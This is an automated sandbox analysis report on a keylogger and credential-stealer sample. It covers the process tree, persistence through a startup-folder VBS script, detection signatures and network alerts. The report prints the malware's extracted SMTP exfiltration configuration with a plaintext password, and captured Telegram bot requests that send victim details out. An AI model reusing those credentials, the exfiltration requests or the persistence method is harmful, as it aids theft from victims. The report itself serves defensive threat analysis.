Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3i1gMM8K4z.exe

Overview

General Information

Sample name:3i1gMM8K4z.exe
renamed because original name is a hash value
Original sample name:ddadbda4f90dc1d05f3e78ac6e5009c2e6608137b60bce3427e25ffea1b4d944.exe
Analysis ID:1588301
MD5:1d0c53e42bd84b7b7cfabed7dae7f570
SHA1:0b0df40afe9bed5720c361fe7ed63395e1a25f41
SHA256:ddadbda4f90dc1d05f3e78ac6e5009c2e6608137b60bce3427e25ffea1b4d944
Tags:exeRedLineStealeruser-adrian__luca
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 3i1gMM8K4z.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\3i1gMM8K4z.exe" MD5: 1D0C53E42BD84B7B7CFABED7DAE7F570)
    • ghauts.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\3i1gMM8K4z.exe" MD5: 1D0C53E42BD84B7B7CFABED7DAE7F570)
      • RegSvcs.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\3i1gMM8K4z.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 7776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ghauts.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Okeghem\ghauts.exe" MD5: 1D0C53E42BD84B7B7CFABED7DAE7F570)
      • RegSvcs.exe (PID: 7924 cmdline: "C:\Users\user\AppData\Local\Okeghem\ghauts.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.1925396391.0000000003DD0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 DE 88 44 24 2B 88 44 24 2F B0 79 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
00000002.00000002.4172452396.00000000031BF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          Click to see the 31 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.ghauts.exe.3dd0000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 DE 88 44 24 2B 88 44 24 2F B0 79 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          1.2.ghauts.exe.730000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 DE 88 44 24 2B 88 44 24 2F B0 79 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          2.2.RegSvcs.exe.2dd0000.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.RegSvcs.exe.2dd0000.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              2.2.RegSvcs.exe.2dd0000.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                Click to see the 72 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs" , ProcessId: 7776, ProcessName: wscript.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs" , ProcessId: 7776, ProcessName: wscript.exe

                Data Obfuscation

                barindex
                Sigma detected: Drops script at startup location
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Okeghem\ghauts.exe, ProcessId: 7488, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T23:44:13.314218+010028033053Unknown Traffic192.168.2.449733104.21.16.1443TCP
                2025-01-10T23:44:15.771851+010028033053Unknown Traffic192.168.2.449737104.21.16.1443TCP
                2025-01-10T23:44:18.167719+010028033053Unknown Traffic192.168.2.449742104.21.16.1443TCP
                2025-01-10T23:44:21.863717+010028033053Unknown Traffic192.168.2.449753104.21.16.1443TCP
                2025-01-10T23:44:28.800937+010028033053Unknown Traffic192.168.2.449757104.21.16.1443TCP
                2025-01-10T23:44:31.182244+010028033053Unknown Traffic192.168.2.449761104.21.16.1443TCP
                2025-01-10T23:44:33.684415+010028033053Unknown Traffic192.168.2.449765104.21.16.1443TCP
                2025-01-10T23:44:34.928756+010028033053Unknown Traffic192.168.2.449767104.21.16.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T23:44:11.833778+010028032742Potentially Bad Traffic192.168.2.449731158.101.44.24280TCP
                2025-01-10T23:44:12.740058+010028032742Potentially Bad Traffic192.168.2.449731158.101.44.24280TCP
                2025-01-10T23:44:13.974425+010028032742Potentially Bad Traffic192.168.2.449734158.101.44.24280TCP
                2025-01-10T23:44:15.177541+010028032742Potentially Bad Traffic192.168.2.449736158.101.44.24280TCP
                2025-01-10T23:44:27.333823+010028032742Potentially Bad Traffic192.168.2.449755158.101.44.24280TCP
                2025-01-10T23:44:28.240064+010028032742Potentially Bad Traffic192.168.2.449755158.101.44.24280TCP
                2025-01-10T23:44:29.427855+010028032742Potentially Bad Traffic192.168.2.449758158.101.44.24280TCP
                2025-01-10T23:44:30.599431+010028032742Potentially Bad Traffic192.168.2.449760158.101.44.24280TCP
                2025-01-10T23:44:31.818323+010028032742Potentially Bad Traffic192.168.2.449762158.101.44.24280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T23:44:22.751745+010018100071Potentially Bad Traffic192.168.2.449754149.154.167.220443TCP
                2025-01-10T23:44:38.256299+010018100071Potentially Bad Traffic192.168.2.449772149.154.167.220443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
                Source: 2.2.RegSvcs.exe.2dd0000.2.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeReversingLabs: Detection: 65%
                Multi AV Scanner detection for submitted file
                Source: 3i1gMM8K4z.exeReversingLabs: Detection: 65%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: 3i1gMM8K4z.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: 3i1gMM8K4z.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49732 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49756 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49754 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2
                Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: ghauts.exe, 00000001.00000003.1766896164.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000001.00000003.1766621481.0000000003870000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920965524.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920393792.0000000004490000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ghauts.exe, 00000001.00000003.1766896164.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000001.00000003.1766621481.0000000003870000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920965524.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920393792.0000000004490000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F4445A
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4C6D1 FindFirstFileW,FindClose,0_2_00F4C6D1
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F4C75C
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F4EF95
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F4F0F2
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F4F3F3
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F437EF
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F43B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F43B12
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F4BCBC
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005F445A GetFileAttributesW,FindFirstFileW,FindClose,1_2_005F445A
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005FC6D1 FindFirstFileW,FindClose,1_2_005FC6D1
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_005FC75C
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005FEF95
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005FF0F2
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_005FF3F3
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005F37EF
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005F3B12
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_005FBCBC
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h2_2_02BFE0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h8_2_0121E0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0566F225h8_2_0566F038
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0566FBAFh8_2_0566F038
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_0566E558

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49772 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49754 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:39:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:00:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49760 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49758 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49762 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49755 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49761 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.16.1:443
